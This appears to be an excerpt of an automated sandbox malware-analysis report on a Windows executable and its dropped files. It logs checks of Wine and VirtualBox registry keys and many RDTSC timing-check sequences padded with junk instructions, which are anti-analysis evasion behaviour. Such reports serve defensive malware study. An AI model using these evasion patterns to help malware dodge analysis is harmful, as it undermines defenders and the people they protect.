                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B1EDA3 second address: B1EDAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B1EDAB second address: B1EDE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3A49Bh 0x00000007 jmp 00007F0704B3A4A1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 push edi 0x00000012 pop edi 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop edi 0x00000016 jmp 00007F0704B3A4A4h 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B266D7 second address: B266DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B266DB second address: B266F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnp 00007F0704B3A496h 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F0704B3A49Bh 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B266F8 second address: B2670B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0704B35536h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop esi 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B2670B second address: B2672B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F0704B3A4A5h 0x0000000a popad 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B268A9 second address: B268B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B268B3 second address: B268B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B26B17 second address: B26B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B26B1B second address: B26B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B26DFD second address: B26E07 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0704B35536h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B2AC6A second address: B2AC70 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B2AC70 second address: B2AC76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B2AC76 second address: B2ACA2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0704B3A496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 78834F42h 0x00000013 mov di, 2392h 0x00000017 lea ebx, dword ptr [ebp+1244F984h] 0x0000001d mov si, 30BCh 0x00000021 xchg eax, ebx 0x00000022 jng 00007F0704B3A4A0h 0x00000028 push eax 0x00000029 push edx 0x0000002a push edi 0x0000002b pop edi 0x0000002c rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B2ACA2 second address: B2ACAF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B2ACAF second address: B2ACBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0704B3A49Bh 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B2AD4C second address: B2AD50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B2AD50 second address: B2AD54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B2AD54 second address: B2ADDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 je 00007F0704B35547h 0x0000000f jmp 00007F0704B35541h 0x00000014 jnl 00007F0704B35538h 0x0000001a popad 0x0000001b nop 0x0000001c jng 00007F0704B35542h 0x00000022 jne 00007F0704B3553Ch 0x00000028 movzx edx, dx 0x0000002b push 00000000h 0x0000002d jnp 00007F0704B3553Ch 0x00000033 mov dword ptr [ebp+122D29D3h], edx 0x00000039 call 00007F0704B35539h 0x0000003e push edx 0x0000003f jmp 00007F0704B35549h 0x00000044 pop edx 0x00000045 push eax 0x00000046 ja 00007F0704B3553Ah 0x0000004c mov eax, dword ptr [esp+04h] 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 jo 00007F0704B35536h 0x00000059 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B2ADDD second address: B2ADEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F0704B3A49Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B2ADEB second address: B2ADF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B2ADF7 second address: B2ADFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B2AF05 second address: B2AF09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B2AF09 second address: B2AF1A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0704B3A496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B2AF1A second address: B2AF38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B35546h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B49D37 second address: B49D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F0704B3A496h 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4A2B9 second address: B4A2D7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0704B35536h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F0704B3553Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4A2D7 second address: B4A2EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jnp 00007F0704B3A496h 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4A2EE second address: B4A2F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4A2F4 second address: B4A2FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4A442 second address: B4A44B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4A44B second address: B4A45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pop esi 0x00000008 jo 00007F0704B3A4AEh 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4A45E second address: B4A466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4A852 second address: B4A873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F0704B3A49Eh 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4A873 second address: B4A877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4A877 second address: B4A89B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3A4A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F0704B3A49Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4A89B second address: B4A8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0704B3553Ah 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4A8A9 second address: B4A8AE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4AA03 second address: B4AA07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4AA07 second address: B4AA0D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4AA0D second address: B4AA13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4AA13 second address: B4AA1E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4AA1E second address: B4AA4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0704B35536h 0x0000000a jo 00007F0704B35536h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ecx 0x00000014 jmp 00007F0704B35540h 0x00000019 js 00007F0704B35542h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4AA4A second address: B4AA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4ABB2 second address: B4ABCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0704B3553Fh 0x00000009 pop edi 0x0000000a ja 00007F0704B3553Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4AD23 second address: B4AD27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4AD27 second address: B4AD30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4AD30 second address: B4AD47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0704B3A496h 0x0000000a pop edx 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F0704B3A496h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B40255 second address: B40269 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0704B35536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F0704B35536h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B40269 second address: B4026D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4B09F second address: B4B0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4B0A5 second address: B4B0B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0704B3A496h 0x0000000a popad 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4B5FC second address: B4B600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4B600 second address: B4B604 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4B604 second address: B4B60A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4B60A second address: B4B624 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0704B3A4A2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4B905 second address: B4B914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0704B35536h 0x0000000a push eax 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4B914 second address: B4B935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0704B3A4A4h 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F0704B3A496h 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4B935 second address: B4B939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4B939 second address: B4B944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4BAC6 second address: B4BACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B4BD50 second address: B4BD5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pop edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop eax 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B519BD second address: B519C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B519C1 second address: B519DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3A4A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B222DC second address: B222E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B222E8 second address: B222EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5749E second address: B574A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B1830F second address: B18314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B56DEF second address: B56DFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0704B35536h 0x0000000a popad 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B56DFA second address: B56DFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5A8CD second address: B5A8D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5A9BC second address: B5A9C1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5B463 second address: B5B469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5B469 second address: B5B46D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5B46D second address: B5B47E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5B47E second address: B5B484 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5B484 second address: B5B488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5B615 second address: B5B61F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0704B3A496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5B725 second address: B5B72C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5BD88 second address: B5BE01 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0704B3A496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F0704B3A4A9h 0x00000012 push ecx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 nop 0x00000018 xor esi, dword ptr [ebp+122D378Bh] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ecx 0x00000025 call 00007F0704B3A498h 0x0000002a pop ecx 0x0000002b mov dword ptr [esp+04h], ecx 0x0000002f add dword ptr [esp+04h], 00000017h 0x00000037 inc ecx 0x00000038 push ecx 0x00000039 ret 0x0000003a pop ecx 0x0000003b ret 0x0000003c mov dword ptr [ebp+122D258Bh], ecx 0x00000042 mov dword ptr [ebp+122D303Eh], eax 0x00000048 xchg eax, ebx 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F0704B3A4A4h 0x00000051 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5C866 second address: B5C86C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5C86C second address: B5C870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5C870 second address: B5C881 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0704B35536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5D89F second address: B5D8A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
